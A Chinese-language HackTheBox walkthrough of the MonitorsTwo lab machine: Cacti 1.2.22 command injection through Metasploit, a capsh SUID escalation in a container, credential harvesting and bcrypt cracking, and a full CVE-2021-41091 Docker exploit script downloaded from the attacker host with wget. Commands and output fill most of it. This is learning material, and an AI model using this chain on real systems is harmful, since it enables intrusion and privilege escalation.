连接至HTB服务器并启动靶机
靶机IP:10.10.11.211
分配IP:10.10.16.7
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.211 -r 1-65535
使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p 22,80 -sCV 10.10.11.211
漏洞利用
使用浏览器访问靶机80端口
由登录界面下方注释可知,当前WebAPP为:Cacti 1.2.22
使用searchsploit搜索该WebAPP漏洞
searchsploit Cacti 1.2.22
启动Metasploit利用该漏洞
msfconsole搜索该WebAPP相关利用模块
search Cacti 1.2.22
切换到该模块
use exploit/linux/http/cacti_unauthenticated_cmd_injection需要配置选项:PAYLOAD、LHOST、LPORT、RHOSTS、RPORT
执行命令exploit或run即可getshell
特权提升
提升TTY
script -c /bin/bash -q /dev/null查看根目录下所有文件,可见文件:.dockerenv这意味着我们在docker容器中
ls -a /www-data@50bca5e748b0:/var/tmp$ ls -a /
ls -a /
. bin entrypoint.sh lib mnt root srv usr
.. boot etc lib64 opt run sys var
.dockerenv dev home media proc sbin tmp
通过Meterpreter上传一个linpeas.sh到容器中
upload linpeas.shmeterpreter > upload linpeas.sh
[*] Uploading : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Uploaded -1.00 B of 805.42 KiB (0.0%): /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Completed : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
为linpeas.sh文件赋权
chmod 777 linpeas.shmeterpreter > shell
Process 12228 created.
Channel 215 created.
script -c /bin/bash -q /dev/null
www-data@50bca5e748b0:/var/tmp$ ls
ls
linpeas.sh
www-data@50bca5e748b0:/var/tmp$ ls -l linpeas.sh
ls -l linpeas.sh
-rw-r--r-- 1 www-data www-data 824745 Nov 19 13:21 linpeas.sh
www-data@50bca5e748b0:/var/tmp$ chmod 777 linpeas.sh
chmod 777 linpeas.sh
直接运行该脚本
./linpeas.sh在扫描到的SUID文件一栏存在/sbin/capsh文件
在GTFOBins中搜索该文件
尝试直接在容器中提权到root用户
/sbin/capsh --gid=0 --uid=0 --www-data@50bca5e748b0:/var/tmp$ /sbin/capsh --gid=0 --uid=0 --
/sbin/capsh --gid=0 --uid=0 --
root@50bca5e748b0:/var/tmp# whoami
whoami
root
横向移动
检索靶机中所有与配置相关的文件
find / -name '*conf*' -type f 2>/dev/null | tee res.txt逐个文件查看内容匹配字符password
cat res.txt | xargs -I {} sh -c 'cat {} | grep -i "password"'
尝试寻找该字符串cactiuser出处
xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txtroot@50bca5e748b0:/var/tmp# xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
<1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
#$rdatabase_username = 'cactiuser';
Found in /var/www/html/include/config.php
查看/var/www/html/include/config.php文件内容
cat /var/www/html/include/config.php
获取了数据库cacti管理员root凭证
账户:root
密码:root
使用凭证及相关信息连接到数据库
mysql -h db -u 'root' -p'root' 'cacti'列出所有表单
SHOW TABLES;MySQL [cacti]> SHOW TABLES;
SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti |
+-------------------------------------+
<...SNIP...>
| snmpagent_cache_notifications |
| snmpagent_cache_textual_conventions |
| snmpagent_managers |
| snmpagent_managers_notifications |
| snmpagent_mibs |
| snmpagent_notifications_log |
| user_auth |
| user_auth_cache |
| user_auth_group |
| user_auth_group_members |
| user_auth_group_perms |
| user_auth_group_realm |
| user_auth_perms |
<...SNIP...>
+-------------------------------------+
111 rows in set (0.001 sec)
这里的user_auth表单引起了我的注意,直接列出该表单数据
SELECT * FROM user_auth;
账户:marcus
密码:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
将哈希值写入文件中
echo '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' > hash使用john进行哈希爆破
john hash --wordlist=../dictionary/rockyou.txt
账户:marcus
密码:funkymonkey
使用该凭证通过SSH服务连接到靶机
ssh marcus@10.10.11.211
查找user_flag位置并查看其内容
marcus@monitorstwo:~$ find / -name 'user.txt' 2>/dev/null
/home/marcus/user.txt
marcus@monitorstwo:~$ cat /home/marcus/user.txt
3cdce88c7f2a5678a8eb5bfe4f9dbb5f
USER_FLAG:3cdce88c7f2a5678a8eb5bfe4f9dbb5f
特权提升
在/var/mail目录下找到marcus文件
国产化后
| 漏洞编号 | 影响对象 | 漏洞原因 | 可能导致后果 | 修复建议 |
|---|---|---|---|---|
| CVE-2021-33033 | 5.11.14 版本之前的 Linux 内核 | 与 DOI 定义的 CIPSO 和 CALIPSO 引用计数有关,存在释放后使用问题 | 攻击者可写入任意值 | 更新内核到 5.11.14 或更高版本 |
| CVE-2020-25706 | Cacti 1.2.13 版本 | xml_path 字段的模板导入预览期间错误消息转义不当 | 恶意代码注入网页,可能导致敏感数据被盗或会话劫持 | 升级到 Cacti 1.2.14 或更高版本 |
| CVE-2021-41091 | Moby(Docker 创建的用于软件容器化的开源项目) | 遍历目录内容并在权限限制不足的数据目录上执行程序 | 权限问题被利用 | 更新到 Moby(Docker 引擎)20.10.9 版本,停止并重启正在运行的容器 |
- 我们已经进入了靶机系统中,而CVE-2020-25706是WebAPP漏洞所以这里不用管
- 其次查看靶机系统内核版本
uname -amarcus@monitorstwo:/var/tmp$ uname -a
Linux monitorstwo 5.4.0-147-generic #164-Ubuntu SMP Tue Mar 21 14:23:17 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
- 5.4.0-147版本与CVE-2021-33033中受影响的5.11.14或更高版本不符
查看靶机系统内docker版本
docker -vmarcus@monitorstwo:/var/tmp$ docker -v
Docker version 20.10.5+dfsg1, build 55c4c88
由输出可见,靶机该版本docker受到CVE-2021-41091特权问题漏洞影响
尝试到Github中寻找该漏洞PoC
#!/bin/bashdocker_version=$(docker --version 2>/dev/null | awk '{print $3}' | sed 's/,//')
if [ -z "$docker_version" ]; thenecho "[x] Docker not found or an error occurred while checking the version."exit 1
fiIFS='.' read -ra ver_parts <<< "$docker_version"
IFS='.' read -ra min_parts <<< "20.10.9"is_vulnerable=true
for i in "${!ver_parts[@]}"; doif [[ "${ver_parts[i]}" -gt "${min_parts[i]}" ]]; thenis_vulnerable=falsebreakelif [[ "${ver_parts[i]}" -lt "${min_parts[i]}" ]]; thenbreakfi
doneif $is_vulnerable; thenoutput=$(findmnt 2>/dev/null)result=$(echo "$output" | grep "/var/lib/docker/overlay2" | awk '{print $1}' | sed 's/..//')if [[ "$result" =~ "/var/lib/docker/overlay2" ]]; thenecho "[!] Vulnerable to CVE-2021-41091"echo "[!] Now connect to your Docker container that is accessible and obtain root access !"echo "[>] After gaining root access execute this command (chmod u+s /bin/bash)"echo ""read -p "Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): " responseif [[ "$response" != "yes" ]]; thenecho "[x] Please set the setuid bit on /bin/bash in the Docker container and try again."exit 2fiecho "[!] Available Overlay2 Filesystems:"echo -e "$result\n"echo "[!] Iterating over the available Overlay2 filesystems !"while read -r path; doecho "[?] Checking path: $path"if cd "$path" 2>/dev/null; thenif ./bin/bash -p 2>/dev/null; thenecho "[!] Rooted !"echo "[>] Current Vulnerable Path: $(pwd)"echo "[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'"echo ""echo "[!] Spawning Shell"cd "$path"exec ./bin/bash -p -ielseecho -e "[x] Could not get root access in '$path'\n"fielseecho -e "[x] Could not access or change directory to '$path'\n"fidone <<< "$result"elseecho "[x] There's no /var/lib/docker/overlay2 files ! Not vulnerable to CVE-2021-41091"fi
elseecho "[x] Docker version is greater or equal to 20.10.9, not vulnerable to CVE-2021-41091"
fi攻击机通过python开启http服务
python -m http.server 6666靶机通过wget将该EXP文件进行下载
wget http://10.10.16.7:6666/exp.sh -O exp.sh为该文件赋权
chmod +x exp.sh直接运行该EXP脚本
./exp.shmarcus@monitorstwo:/var/tmp$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)
此处提示我们在docker容器操作root用户执行命令
chmod u+s /bin/bashroot@50bca5e748b0:/# chmod u+s /bin/bash
chmod u+s /bin/bash
回到SSH服务登录的marcus中回复EXP提问
Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'[!] Spawning Shell
bash-5.1# exit
通过EXP输出提示,我们进入它的指定目录下
cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged重新启动Bash
./bin/bash -p成功getshell
marcus@monitorstwo:/var/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
bash-5.1# whoami
root
查找root_flag位置并查看其内容
bash-5.1# find / -name 'root.txt'
find: ‘/proc/4515/task/4515/net’: Invalid argument
find: ‘/proc/4515/net’: Invalid argument
/root/root.txt
bash-5.1# cat /root/root.txt
3a46a93a5f2c49137b7972724fd00c05
)
)
-任务)
